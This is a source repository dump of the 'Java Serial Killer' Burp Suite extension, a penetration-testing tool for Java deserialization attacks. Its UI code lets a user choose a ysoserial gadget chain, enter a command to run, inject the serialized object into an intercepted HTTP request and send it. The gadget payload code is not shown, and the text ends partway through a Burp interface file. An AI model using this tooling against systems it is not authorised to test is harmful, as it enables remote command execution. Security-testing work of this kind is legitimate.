├── .gitignore
├── LICENSE
├── README.md
├── pom.xml
└── src
└── main
└── java
├── burp
├── BurpExtender.java
├── ButtonTabComponent.java
├── ChildTab.java
├── IBurpExtender.java
├── IBurpExtenderCallbacks.java
├── IContextMenuFactory.java
├── IContextMenuInvocation.java
├── ICookie.java
├── IExtensionHelpers.java
├── IExtensionStateListener.java
├── IHttpListener.java
├── IHttpRequestResponse.java
├── IHttpRequestResponsePersisted.java
├── IHttpRequestResponseWithMarkers.java
├── IHttpService.java
├── IInterceptedProxyMessage.java
├── IIntruderAttack.java
├── IIntruderPayloadGenerator.java
├── IIntruderPayloadGeneratorFactory.java
├── IIntruderPayloadProcessor.java
├── IMenuItemHandler.java
├── IMessageEditor.java
├── IMessageEditorController.java
├── IMessageEditorTab.java
├── IMessageEditorTabFactory.java
├── IParameter.java
├── IProxyListener.java
├── IRequestInfo.java
├── IResponseInfo.java
├── IScanIssue.java
├── IScanQueueItem.java
├── IScannerCheck.java
├── IScannerInsertionPoint.java
├── IScannerInsertionPointProvider.java
├── IScannerListener.java
├── IScopeChangeListener.java
├── ISessionHandlingAction.java
├── ITab.java
├── ITempFile.java
├── ITextEditor.java
├── JavaSerialKiller.java
├── JavaSerialKillerTab.java
├── Menu.java
└── Utilities.java
└── ysoserial
├── Deserializer.java
├── GeneratePayload.java
├── Serializer.java
├── payloads
├── BeanShell1.java
├── CommonsBeanutilsCollectionsLogging1.java
├── CommonsCollections1.java
├── CommonsCollections2.java
├── CommonsCollections3.java
├── CommonsCollections4.java
├── Groovy1.java
├── Jdk7u21.java
├── ObjectPayload.java
├── Spring1.java
├── annotation
│ └── Dependencies.java
└── util
│ ├── ClassFiles.java
│ ├── Gadgets.java
│ ├── PayloadRunner.java
│ └── Reflections.java
└── secmgr
├── DelegateSecurityManager.java
├── ExecCheckingSecurityManager.java
└── ThreadLocalSecurityManager.java
/.gitignore:
--------------------------------------------------------------------------------
1 | # Created by https://www.gitignore.io
2 |
3 | ### OSX ###
4 | .DS_Store
5 | .AppleDouble
6 | .LSOverride
7 |
8 | # Icon must end with two \r
9 | Icon
10 |
11 |
12 | # Thumbnails
13 | ._*
14 |
15 | # Files that might appear in the root of a volume
16 | .DocumentRevisions-V100
17 | .fseventsd
18 | .Spotlight-V100
19 | .TemporaryItems
20 | .Trashes
21 | .VolumeIcon.icns
22 |
23 | # Directories potentially created on remote AFP share
24 | .AppleDB
25 | .AppleDesktop
26 | Network Trash Folder
27 | Temporary Items
28 | .apdisk
29 |
30 |
31 | ### Intellij ###
32 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm
33 |
34 | *.iml
35 |
36 | ## Directory-based project format:
37 | .idea/
38 | # if you remove the above rule, at least ignore the following:
39 |
40 | # User-specific stuff:
41 | # .idea/workspace.xml
42 | # .idea/tasks.xml
43 | # .idea/dictionaries
44 |
45 | # Sensitive or high-churn files:
46 | # .idea/dataSources.ids
47 | # .idea/dataSources.xml
48 | # .idea/sqlDataSources.xml
49 | # .idea/dynamic.xml
50 | # .idea/uiDesigner.xml
51 |
52 | # Gradle:
53 | # .idea/gradle.xml
54 | # .idea/libraries
55 |
56 | # Mongo Explorer plugin:
57 | # .idea/mongoSettings.xml
58 |
59 | ## File-based project format:
60 | *.ipr
61 | *.iws
62 |
63 | ## Plugin-specific files:
64 |
65 | # IntelliJ
66 | /out/
67 | /target/
68 |
69 | # mpeltonen/sbt-idea plugin
70 | .idea_modules/
71 |
72 | # JIRA plugin
73 | atlassian-ide-plugin.xml
74 |
75 | # Crashlytics plugin (for Android Studio and IntelliJ)
76 | com_crashlytics_export_strings.xml
77 | crashlytics.properties
78 | crashlytics-build.properties
79 |
80 |
81 | ### Java ###
82 | *.class
83 |
84 | # Mobile Tools for Java (J2ME)
85 | .mtj.tmp/
86 |
87 | # Package Files #
88 | *.jar
89 | *.war
90 | *.ear
91 |
92 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
93 | hs_err_pid*
94 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2016 NetSPI
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Note
2 | **I am not actively updating this extension. I recommend using either https://github.com/federicodotta/Java-Deserialization-Scanner, https://portswigger.net/bappstore/e20cad259d73403bba5ac4e393a8583f, or https://portswigger.net/bappstore/ae1cce0c6d6c47528b4af35faebc3ab3 for exploiting Java Deserialization**
3 |
4 | # Java Serial Killer
5 |
6 | Burp extension to perform Java Deserialization Attacks using the ysoserial payload generator tool.
7 |
8 | Blog https://blog.netspi.com/java-deserialization-attacks-burp/
9 |
10 | Chris Frohoff's ysoserial (https://github.com/frohoff/ysoserial)
11 |
12 | ## Download & Requirements
13 |
14 | Download from the Releases tab: https://github.com/NetSPI/JavaSerialKiller/releases
15 |
16 | Requirements: Java 8
17 |
18 | ## Instructions
19 |
20 | 1. Right-click on a request and select Send to Java Serial Killer
21 | 
22 | 2. Highlight the area or parameter you want the serialized Java object to replace
23 | 3. Select the payload that you want, type in the command, choose to base64 encode or not, and press Serialize
24 |
25 | Note: You do not need to re-highlight the serialized Java object if you change the payload or command. It will automatically update the request with the correct serialization in the spot that you highlighted the first time, even if you base64 encode it.
26 |
27 | 4. From here you can press Go button to send the request or right-click and send it to another tool.
28 |
29 | ##Examples
30 | ###Serialize Request Body
31 | 1. Highlight request body
32 | 
33 | 2. Press the Serialize button
34 | 
35 | 3. Check the Base64 Encode box and press the Serialize button
36 | 
37 |
38 | ###Serialize Request Body Parameter
39 | 1. Highlighting parameter in request body
40 | 
41 | 2. Press the Serialize button
42 | 
43 | 3. Check the Base64 Encode box and press the Serialize button
44 | 
45 |
46 |
47 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | com.netspi.javaserialkiller
8 | javaserialkiller
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 | org.apache.maven.plugins
14 | maven-assembly-plugin
15 |
16 |
17 |
18 | jar-with-dependencies
19 |
20 |
21 |
22 |
23 | make-assembly
24 |
25 | package
26 |
27 | single
28 |
29 |
30 |
31 |
32 |
33 | org.apache.maven.plugins
34 | maven-compiler-plugin
35 |
36 | 8
37 | 8
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 | org.apache.commons
46 | commons-collections4
47 | 4.0
48 |
49 |
50 | org.reflections
51 | reflections
52 | 0.9.10
53 |
54 |
55 | org.beanshell
56 | bsh
57 | 2.0b5
58 |
59 |
60 | commons-beanutils
61 | commons-beanutils
62 | 1.7.0
63 |
64 |
65 | org.codehaus.groovy
66 | groovy-all
67 | 2.1.2
68 |
69 |
70 | commons-collections
71 | commons-collections
72 | 3.2.2
73 |
74 |
75 | org.springframework
76 | spring-beans
77 | 3.0.5.RELEASE
78 |
79 |
80 | org.springframework
81 | spring-core
82 | 4.1.4.RELEASE
83 |
84 |
85 | com.google.guava
86 | guava
87 | 23
88 |
89 |
90 | com.google.guava
91 | guava
92 | 16.0.1
93 |
94 |
95 |
--------------------------------------------------------------------------------
/src/main/java/burp/BurpExtender.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | public class BurpExtender implements IBurpExtender
4 | {
5 |
6 | @Override
7 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
8 | {
9 |
10 | callbacks.setExtensionName("Java Serial Killer");
11 |
12 | callbacks.registerContextMenuFactory(new Menu(callbacks));
13 |
14 | }
15 | }
--------------------------------------------------------------------------------
/src/main/java/burp/ButtonTabComponent.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import java.awt.*;
4 | import java.awt.event.ActionEvent;
5 | import java.awt.event.ActionListener;
6 | import java.awt.event.MouseAdapter;
7 | import java.awt.event.MouseEvent;
8 | import java.awt.event.MouseListener;
9 |
10 | import javax.swing.*;
11 | import javax.swing.plaf.basic.BasicButtonUI;
12 |
13 | /**
14 | * Component to be used as tabComponent; Contains a JLabel to show the text and a JButton to close the tab it belongs to
15 | */
16 | public class ButtonTabComponent extends JPanel {
17 |
18 | private final JTabbedPane pane;
19 |
20 | public ButtonTabComponent(final JTabbedPane pane) {
21 | //unset default FlowLayout' gaps
22 | super(new FlowLayout(FlowLayout.LEFT, 0, 0));
23 | if (pane == null) {
24 | throw new NullPointerException("TabbedPane is null");
25 | }
26 | this.pane = pane;
27 | setOpaque(false);
28 |
29 | //make JLabel read titles from JTabbedPane
30 | JLabel label = new JLabel() {
31 | public String getText() {
32 | int i = pane.indexOfTabComponent(ButtonTabComponent.this);
33 | if (i != -1) {
34 | return pane.getTitleAt(i);
35 | }
36 | return null;
37 | }
38 | };
39 |
40 | add(label);
41 | //add more space between the label and the button
42 | label.setBorder(BorderFactory.createEmptyBorder(0, 0, 0, 5));
43 | //tab button
44 | JButton button = new TabButton();
45 | add(button);
46 | //add more space to the top of the component
47 | setBorder(BorderFactory.createEmptyBorder(2, 0, 0, 0));
48 | }
49 |
50 | private class TabButton extends JButton implements ActionListener {
51 |
52 | public TabButton() {
53 | int size = 17;
54 | setPreferredSize(new Dimension(size, size));
55 | setToolTipText("close this tab");
56 | //Make the button looks the same for all Laf's
57 | setUI(new BasicButtonUI());
58 | //Make it transparent
59 | setContentAreaFilled(false);
60 | //No need to be focusable
61 | setFocusable(false);
62 | setBorder(BorderFactory.createEtchedBorder());
63 | setBorderPainted(false);
64 | //Making nice rollover effect
65 | //we use the same listener for all buttons
66 | addMouseListener(buttonMouseListener);
67 | setRolloverEnabled(true);
68 | //Close the proper tab by clicking the button
69 | addActionListener(this);
70 | }
71 |
72 | public void actionPerformed(ActionEvent e) {
73 | int i = pane.indexOfTabComponent(ButtonTabComponent.this);
74 | if (i != -1) {
75 | pane.remove(i);
76 | JavaSerialKillerTab.removedTabCount++;
77 | }
78 | }
79 |
80 | //we don't want to update UI for this button
81 | public void updateUI() {
82 | }
83 |
84 | //paint the cross
85 | protected void paintComponent(Graphics g) {
86 | super.paintComponent(g);
87 | Graphics2D g2 = (Graphics2D) g.create();
88 | //shift the image for pressed buttons
89 | if (getModel().isPressed()) {
90 | g2.translate(1, 1);
91 | }
92 | g2.setStroke(new BasicStroke(2));
93 | g2.setColor(Color.BLACK);
94 | if (getModel().isRollover()) {
95 | g2.setColor(Color.BLACK);
96 | }
97 | int delta = 6;
98 | g2.drawLine(delta, delta, getWidth() - delta - 1, getHeight() - delta - 1);
99 | g2.drawLine(getWidth() - delta - 1, delta, delta, getHeight() - delta - 1);
100 | g2.dispose();
101 | }
102 | }
103 |
104 | private final static MouseListener buttonMouseListener = new MouseAdapter() {
105 | public void mouseEntered(MouseEvent e) {
106 | Component component = e.getComponent();
107 | if (component instanceof AbstractButton) {
108 | AbstractButton button = (AbstractButton) component;
109 | button.setBorderPainted(true);
110 | }
111 | }
112 |
113 | public void mouseExited(MouseEvent e) {
114 | Component component = e.getComponent();
115 | if (component instanceof AbstractButton) {
116 | AbstractButton button = (AbstractButton) component;
117 | button.setBorderPainted(false);
118 | }
119 | }
120 | };
121 | }
--------------------------------------------------------------------------------
/src/main/java/burp/ChildTab.java:
--------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import com.google.common.primitives.Bytes;
4 |
5 | import javax.swing.*;
6 | import java.awt.*;
7 | import java.awt.event.ActionEvent;
8 | import java.awt.event.ActionListener;
9 | import java.util.Arrays;
10 |
11 | public class ChildTab implements IMessageEditorController, ActionListener {
12 |
13 | private final IMessageEditor requestViewer;
14 | private final IMessageEditor responseViewer;
15 | private final IBurpExtenderCallbacks callbacks;
16 | private final IExtensionHelpers helpers;
17 | private final IHttpService httpService;
18 |
19 | private byte[] request;
20 | private byte[] response;
21 |
22 | public static byte[] selectedMessage;
23 |
24 | private final JPanel panel;
25 |
26 | public static boolean isEncoded;
27 | public static boolean isCompressed;
28 |
29 | JButton goButton;
30 | JCheckBox base64CheckBox;
31 | JCheckBox compressCheckBox;
32 |
33 | private final JComboBox payloadComboBox;
34 |
35 | private final JTextField commandTextField;
36 |
37 | private final JLabel status;
38 |
39 | public ChildTab(final IBurpExtenderCallbacks callbacks, JTabbedPane tabbedPane, String title, byte[] request, IHttpService httpService) {
40 | this.callbacks = callbacks;
41 | this.helpers = callbacks.getHelpers();
42 | this.httpService = httpService;
43 | this.request = request;
44 |
45 | panel = new JPanel();
46 | panel.setLayout(new BoxLayout(panel, BoxLayout.PAGE_AXIS));
47 | requestViewer = callbacks.createMessageEditor(this, true);
48 | responseViewer = callbacks.createMessageEditor(this, false);
49 | requestViewer.setMessage(request, true);
50 |
51 | JPanel leftSplitPanePanel = new JPanel();
52 | leftSplitPanePanel.setLayout(new BorderLayout());
53 |
54 | leftSplitPanePanel.add(requestViewer.getComponent());
55 |
56 | JSplitPane splitPane = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
57 | splitPane.setAlignmentX(Component.CENTER_ALIGNMENT);
58 | splitPane.setResizeWeight(0.5);
59 | splitPane.setLeftComponent(leftSplitPanePanel);
60 | splitPane.setRightComponent(responseViewer.getComponent());
61 |
62 | JPanel topButtonPanel = new JPanel();
63 | topButtonPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
64 | goButton = new JButton("Go");
65 | goButton.setActionCommand("go");
66 | goButton.addActionListener(ChildTab.this);
67 | JButton serializeButton = new JButton("Serialize");
68 | serializeButton.setActionCommand("serialize");
69 | serializeButton.addActionListener(ChildTab.this);
70 |
71 | compressCheckBox = new JCheckBox("Gzip");
72 | base64CheckBox = new JCheckBox("Base64 Encode");
73 |
74 | String[] typeStrings = { "BeanShell1","CommonsBeanutilsCollectionsLogging1", "CommonsCollections1", "CommonsCollections2", "CommonsCollections3", "CommonsCollections4","Groovy1","Jdk7u21","Spring1"};
75 | payloadComboBox = new JComboBox<>(typeStrings);
76 | JButton helpButton = new JButton("?");
77 | helpButton.setActionCommand("?");
78 | helpButton.addActionListener(ChildTab.this);
79 | topButtonPanel.add(goButton);
80 | topButtonPanel.add(serializeButton);
81 | topButtonPanel.add(compressCheckBox);
82 | topButtonPanel.add(base64CheckBox);
83 | topButtonPanel.add(payloadComboBox);
84 | topButtonPanel.add(helpButton);
85 |
86 | JPanel commandPanel = new JPanel();
87 | commandPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
88 | JLabel commandLabel = new JLabel("Command: ");
89 | commandTextField = new JTextField(50);
90 | commandTextField.setMaximumSize(new Dimension(Integer.MAX_VALUE, commandTextField.getPreferredSize().height));
91 | commandPanel.add(commandLabel);
92 | commandPanel.add(commandTextField);
93 |
94 | JPanel bottomPanel = new JPanel();
95 | bottomPanel.setLayout(new FlowLayout(FlowLayout.LEFT));
96 | status = new JLabel("Done");
97 | bottomPanel.add(status);
98 |
99 | panel.add(topButtonPanel);
100 | panel.add(commandPanel);
101 | panel.add(splitPane);
102 | panel.add(bottomPanel);
103 |
104 | tabbedPane.add(title, panel);
105 | tabbedPane.setTabComponentAt(JavaSerialKillerTab.tabCount - JavaSerialKillerTab.removedTabCount, new ButtonTabComponent(tabbedPane));
106 |
107 | }
108 |
109 | private void sendRequest() {
110 |
111 | Thread thread = new Thread() {
112 | public void run() {
113 | IRequestInfo iRequestInfo = helpers.analyzeRequest(requestViewer.getMessage());
114 | byte[] requestMessage = requestViewer.getMessage();
115 | java.util.List headers = iRequestInfo.getHeaders();
116 | int bodyOffset = iRequestInfo.getBodyOffset();
117 | byte[] newBody = new byte[requestMessage.length - bodyOffset];
118 |
119 | System.arraycopy(requestMessage, bodyOffset, newBody, 0, requestMessage.length - bodyOffset);
120 |
121 | byte[] requestHTTPMessage = helpers.buildHttpMessage(headers, newBody);
122 | responseViewer.setMessage(new byte[0], false);
123 | status.setText("Waiting");
124 | goButton.setEnabled(false);
125 | IHttpRequestResponse httpMessage = callbacks.makeHttpRequest(httpService, requestHTTPMessage);
126 | status.setText("Done");
127 | responseViewer.setMessage(httpMessage.getResponse(), false);
128 | response = httpMessage.getResponse();
129 | goButton.setEnabled(true);
130 | }
131 | };
132 | thread.start();
133 |
134 | }
135 |
136 | private void serializeRequest() {
137 |
138 | byte[] message = requestViewer.getMessage();
139 |
140 | byte[] selectedMessage = requestViewer.getSelectedData();
141 |
142 | // String[] command = Utilities.formatCommand(commandTextField.getText());
143 |
144 | boolean isEncoded = base64CheckBox.isSelected();
145 | boolean isCommpressed = compressCheckBox.isSelected();
146 |
147 | String command = commandTextField.getText();
148 |
149 | String payloadType = payloadComboBox.getSelectedItem().toString();
150 |
151 | byte[] httpMessage = Utilities.serializeRequest(message,selectedMessage,isEncoded, isCommpressed,command,helpers,payloadType);
152 |
153 | requestViewer.setMessage(httpMessage, true);
154 |
155 | request = httpMessage;
156 | }
157 |
158 | private void questionDialog(){
159 |
160 | JOptionPane.showMessageDialog(this.panel,"BeanShell1 [org.beanshell:bsh:2.0b5]\n" +
161 | "CommonsBeanutilsCollectionsLogging1 [commons-beanutils:commons-beanutils:1.9.2, commons-collections:commons-collections:3.1, commons-logging:commons-logging:1.2]\n" +
162 | "CommonsCollections1 [commons-collections:commons-collections:3.1]\n" +
163 | "CommonsCollections2 [org.apache.commons:commons-collections4:4.0]\n" +
164 | "CommonsCollections3 [commons-collections:commons-collections:3.1]\n" +
165 | "CommonsCollections4 [org.apache.commons:commons-collections4:4.0]\n" +
166 | "Groovy1 [org.codehaus.groovy:groovy:2.3.9]\n" +
167 | "Jdk7u21 []\n" +
168 | "Spring1 [org.springframework:spring-core:4.1.4.RELEASE, org.springframework:spring-beans:4.1.4.RELEASE]",
169 | "ysoserial Payload Options",
170 | JOptionPane.PLAIN_MESSAGE);
171 |
172 | }
173 |
174 | public void actionPerformed(ActionEvent event) {
175 |
176 | String command = event.getActionCommand();
177 |
178 | switch (command) {
179 | case "go":
180 | sendRequest();
181 | break;
182 | case "serialize":
183 | serializeRequest();
184 | break;
185 | case "?":
186 | questionDialog();
187 | break;
188 | }
189 | }
190 |
191 | public IHttpService getHttpService() {
192 | return httpService;
193 | }
194 |
195 | public byte[] getRequest() {
196 | return request;
197 | }
198 |
199 | public byte[] getResponse() {
200 | return response;
201 | }
202 | }
--------------------------------------------------------------------------------
/src/main/java/burp/IBurpExtender.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IBurpExtender.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | /**
11 | * All extensions must implement this interface.
12 | *
13 | * Implementations must be called BurpExtender, in the package burp, must be
14 | * declared public, and must provide a default (public, no-argument)
15 | * constructor.
16 | */
17 | public interface IBurpExtender
18 | {
19 | /**
20 | * This method is invoked when the extension is loaded. It registers an
21 | * instance of the
22 | * burp.IBurpExtenderCallbacks interface, providing methods that may
23 | * be invoked by the extension to perform various actions.
24 | *
25 | * @param callbacks An
26 | * burp.IBurpExtenderCallbacks object.
27 | */
28 | void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks);
29 | }
30 |
--------------------------------------------------------------------------------
/src/main/java/burp/IBurpExtenderCallbacks.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IBurpExtenderCallbacks.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.awt.Component;
11 | import java.io.OutputStream;
12 | import java.util.List;
13 | import java.util.Map;
14 |
15 | /**
16 | * This interface is used by Burp Suite to pass to extensions a set of callback
17 | * methods that can be used by extensions to perform various actions within
18 | * Burp.
19 | *
20 | * When an extension is loaded, Burp invokes its
21 | * registerExtenderCallbacks() method and passes an instance of the
22 | * burp.IBurpExtenderCallbacks interface. The extension may then invoke
23 | * the methods of this interface as required in order to extend Burp's
24 | * functionality.
25 | */
26 | public interface IBurpExtenderCallbacks
27 | {
28 | /**
29 | * Flag used to identify Burp Suite as a whole.
30 | */
31 | static final int TOOL_SUITE = 0x00000001;
32 | /**
33 | * Flag used to identify the Burp Target tool.
34 | */
35 | static final int TOOL_TARGET = 0x00000002;
36 | /**
37 | * Flag used to identify the Burp Proxy tool.
38 | */
39 | static final int TOOL_PROXY = 0x00000004;
40 | /**
41 | * Flag used to identify the Burp Spider tool.
42 | */
43 | static final int TOOL_SPIDER = 0x00000008;
44 | /**
45 | * Flag used to identify the Burp Scanner tool.
46 | */
47 | static final int TOOL_SCANNER = 0x00000010;
48 | /**
49 | * Flag used to identify the Burp Intruder tool.
50 | */
51 | static final int TOOL_INTRUDER = 0x00000020;
52 | /**
53 | * Flag used to identify the Burp Repeater tool.
54 | */
55 | static final int TOOL_REPEATER = 0x00000040;
56 | /**
57 | * Flag used to identify the Burp Sequencer tool.
58 | */
59 | static final int TOOL_SEQUENCER = 0x00000080;
60 | /**
61 | * Flag used to identify the Burp Decoder tool.
62 | */
63 | static final int TOOL_DECODER = 0x00000100;
64 | /**
65 | * Flag used to identify the Burp Comparer tool.
66 | */
67 | static final int TOOL_COMPARER = 0x00000200;
68 | /**
69 | * Flag used to identify the Burp Extender tool.
70 | */
71 | static final int TOOL_EXTENDER = 0x00000400;
72 |
73 | /**
74 | * This method is used to set the display name for the current extension,
75 | * which will be displayed within the user interface for the Extender tool.
76 | *
77 | * @param name The extension name.
78 | */
79 | void setExtensionName(String name);
80 |
81 | /**
82 | * This method is used to obtain an
83 | * burp.IExtensionHelpers object, which can be used by the extension
84 | * to perform numerous useful tasks.
85 | *
86 | * @return An object containing numerous helper methods, for tasks such as
87 | * building and analyzing HTTP requests.
88 | */
89 | IExtensionHelpers getHelpers();
90 |
91 | /**
92 | * This method is used to obtain the current extension's standard output
93 | * stream. Extensions should write all output to this stream, allowing the
94 | * Burp user to configure how that output is handled from within the UI.
95 | *
96 | * @return The extension's standard output stream.
97 | */
98 | OutputStream getStdout();
99 |
100 | /**
101 | * This method is used to obtain the current extension's standard error
102 | * stream. Extensions should write all error messages to this stream,
103 | * allowing the Burp user to configure how that output is handled from
104 | * within the UI.
105 | *
106 | * @return The extension's standard error stream.
107 | */
108 | OutputStream getStderr();
109 |
110 | /**
111 | * This method prints a line of output to the current extension's standard
112 | * output stream.
113 | *
114 | * @param output The message to print.
115 | */
116 | void printOutput(String output);
117 |
118 | /**
119 | * This method prints a line of output to the current extension's standard
120 | * error stream.
121 | *
122 | * @param error The message to print.
123 | */
124 | void printError(String error);
125 |
126 | /**
127 | * This method is used to register a listener which will be notified of
128 | * changes to the extension's state. Note: Any extensions that start
129 | * background threads or open system resources (such as files or database
130 | * connections) should register a listener and terminate threads / close
131 | * resources when the extension is unloaded.
132 | *
133 | * @param listener An object created by the extension that implements the
134 | * burp.IExtensionStateListener interface.
135 | */
136 | void registerExtensionStateListener(IExtensionStateListener listener);
137 |
138 | /**
139 | * This method is used to retrieve the extension state listeners that are
140 | * registered by the extension.
141 | *
142 | * @return A list of extension state listeners that are currently registered
143 | * by this extension.
144 | */
145 | List getExtensionStateListeners();
146 |
147 | /**
148 | * This method is used to remove an extension state listener that has been
149 | * registered by the extension.
150 | *
151 | * @param listener The extension state listener to be removed.
152 | */
153 | void removeExtensionStateListener(IExtensionStateListener listener);
154 |
155 | /**
156 | * This method is used to register a listener which will be notified of
157 | * requests and responses made by any Burp tool. Extensions can perform
158 | * custom analysis or modification of these messages by registering an HTTP
159 | * listener.
160 | *
161 | * @param listener An object created by the extension that implements the
162 | * burp.IHttpListener interface.
163 | */
164 | void registerHttpListener(IHttpListener listener);
165 |
166 | /**
167 | * This method is used to retrieve the HTTP listeners that are registered by
168 | * the extension.
169 | *
170 | * @return A list of HTTP listeners that are currently registered by this
171 | * extension.
172 | */
173 | List getHttpListeners();
174 |
175 | /**
176 | * This method is used to remove an HTTP listener that has been registered
177 | * by the extension.
178 | *
179 | * @param listener The HTTP listener to be removed.
180 | */
181 | void removeHttpListener(IHttpListener listener);
182 |
183 | /**
184 | * This method is used to register a listener which will be notified of
185 | * requests and responses being processed by the Proxy tool. Extensions can
186 | * perform custom analysis or modification of these messages, and control
187 | * in-UI message interception, by registering a proxy listener.
188 | *
189 | * @param listener An object created by the extension that implements the
190 | * burp.IProxyListener interface.
191 | */
192 | void registerProxyListener(IProxyListener listener);
193 |
194 | /**
195 | * This method is used to retrieve the Proxy listeners that are registered
196 | * by the extension.
197 | *
198 | * @return A list of Proxy listeners that are currently registered by this
199 | * extension.
200 | */
201 | List getProxyListeners();
202 |
203 | /**
204 | * This method is used to remove a Proxy listener that has been registered
205 | * by the extension.
206 | *
207 | * @param listener The Proxy listener to be removed.
208 | */
209 | void removeProxyListener(IProxyListener listener);
210 |
211 | /**
212 | * This method is used to register a listener which will be notified of new
213 | * issues that are reported by the Scanner tool. Extensions can perform
214 | * custom analysis or logging of Scanner issues by registering a Scanner
215 | * listener.
216 | *
217 | * @param listener An object created by the extension that implements the
218 | * burp.IScannerListener interface.
219 | */
220 | void registerScannerListener(IScannerListener listener);
221 |
222 | /**
223 | * This method is used to retrieve the Scanner listeners that are registered
224 | * by the extension.
225 | *
226 | * @return A list of Scanner listeners that are currently registered by this
227 | * extension.
228 | */
229 | List getScannerListeners();
230 |
231 | /**
232 | * This method is used to remove a Scanner listener that has been registered
233 | * by the extension.
234 | *
235 | * @param listener The Scanner listener to be removed.
236 | */
237 | void removeScannerListener(IScannerListener listener);
238 |
239 | /**
240 | * This method is used to register a listener which will be notified of
241 | * changes to Burp's suite-wide target scope.
242 | *
243 | * @param listener An object created by the extension that implements the
244 | * burp.IScopeChangeListener interface.
245 | */
246 | void registerScopeChangeListener(IScopeChangeListener listener);
247 |
248 | /**
249 | * This method is used to retrieve the scope change listeners that are
250 | * registered by the extension.
251 | *
252 | * @return A list of scope change listeners that are currently registered by
253 | * this extension.
254 | */
255 | List getScopeChangeListeners();
256 |
257 | /**
258 | * This method is used to remove a scope change listener that has been
259 | * registered by the extension.
260 | *
261 | * @param listener The scope change listener to be removed.
262 | */
263 | void removeScopeChangeListener(IScopeChangeListener listener);
264 |
265 | /**
266 | * This method is used to register a factory for custom context menu items.
267 | * When the user invokes a context menu anywhere within Burp, the factory
268 | * will be passed details of the invocation event, and asked to provide any
269 | * custom context menu items that should be shown.
270 | *
271 | * @param factory An object created by the extension that implements the
272 | * burp.IContextMenuFactory interface.
273 | */
274 | void registerContextMenuFactory(IContextMenuFactory factory);
275 |
276 | /**
277 | * This method is used to retrieve the context menu factories that are
278 | * registered by the extension.
279 | *
280 | * @return A list of context menu factories that are currently registered by
281 | * this extension.
282 | */
283 | List getContextMenuFactories();
284 |
285 | /**
286 | * This method is used to remove a context menu factory that has been
287 | * registered by the extension.
288 | *
289 | * @param factory The context menu factory to be removed.
290 | */
291 | void removeContextMenuFactory(IContextMenuFactory factory);
292 |
293 | /**
294 | * This method is used to register a factory for custom message editor tabs.
295 | * For each message editor that already exists, or is subsequently created,
296 | * within Burp, the factory will be asked to provide a new instance of an
297 | * burp.IMessageEditorTab object, which can provide custom rendering
298 | * or editing of HTTP messages.
299 | *
300 | * @param factory An object created by the extension that implements the
301 | * burp.IMessageEditorTabFactory interface.
302 | */
303 | void registerMessageEditorTabFactory(IMessageEditorTabFactory factory);
304 |
305 | /**
306 | * This method is used to retrieve the message editor tab factories that are
307 | * registered by the extension.
308 | *
309 | * @return A list of message editor tab factories that are currently
310 | * registered by this extension.
311 | */
312 | List getMessageEditorTabFactories();
313 |
314 | /**
315 | * This method is used to remove a message editor tab factory that has been
316 | * registered by the extension.
317 | *
318 | * @param factory The message editor tab factory to be removed.
319 | */
320 | void removeMessageEditorTabFactory(IMessageEditorTabFactory factory);
321 |
322 | /**
323 | * This method is used to register a provider of Scanner insertion points.
324 | * For each base request that is actively scanned, Burp will ask the
325 | * provider to provide any custom scanner insertion points that are
326 | * appropriate for the request.
327 | *
328 | * @param provider An object created by the extension that implements the
329 | * burp.IScannerInsertionPointProvider interface.
330 | */
331 | void registerScannerInsertionPointProvider(
332 | IScannerInsertionPointProvider provider);
333 |
334 | /**
335 | * This method is used to retrieve the Scanner insertion point providers
336 | * that are registered by the extension.
337 | *
338 | * @return A list of Scanner insertion point providers that are currently
339 | * registered by this extension.
340 | */
341 | List getScannerInsertionPointProviders();
342 |
343 | /**
344 | * This method is used to remove a Scanner insertion point provider that has
345 | * been registered by the extension.
346 | *
347 | * @param provider The Scanner insertion point provider to be removed.
348 | */
349 | void removeScannerInsertionPointProvider(
350 | IScannerInsertionPointProvider provider);
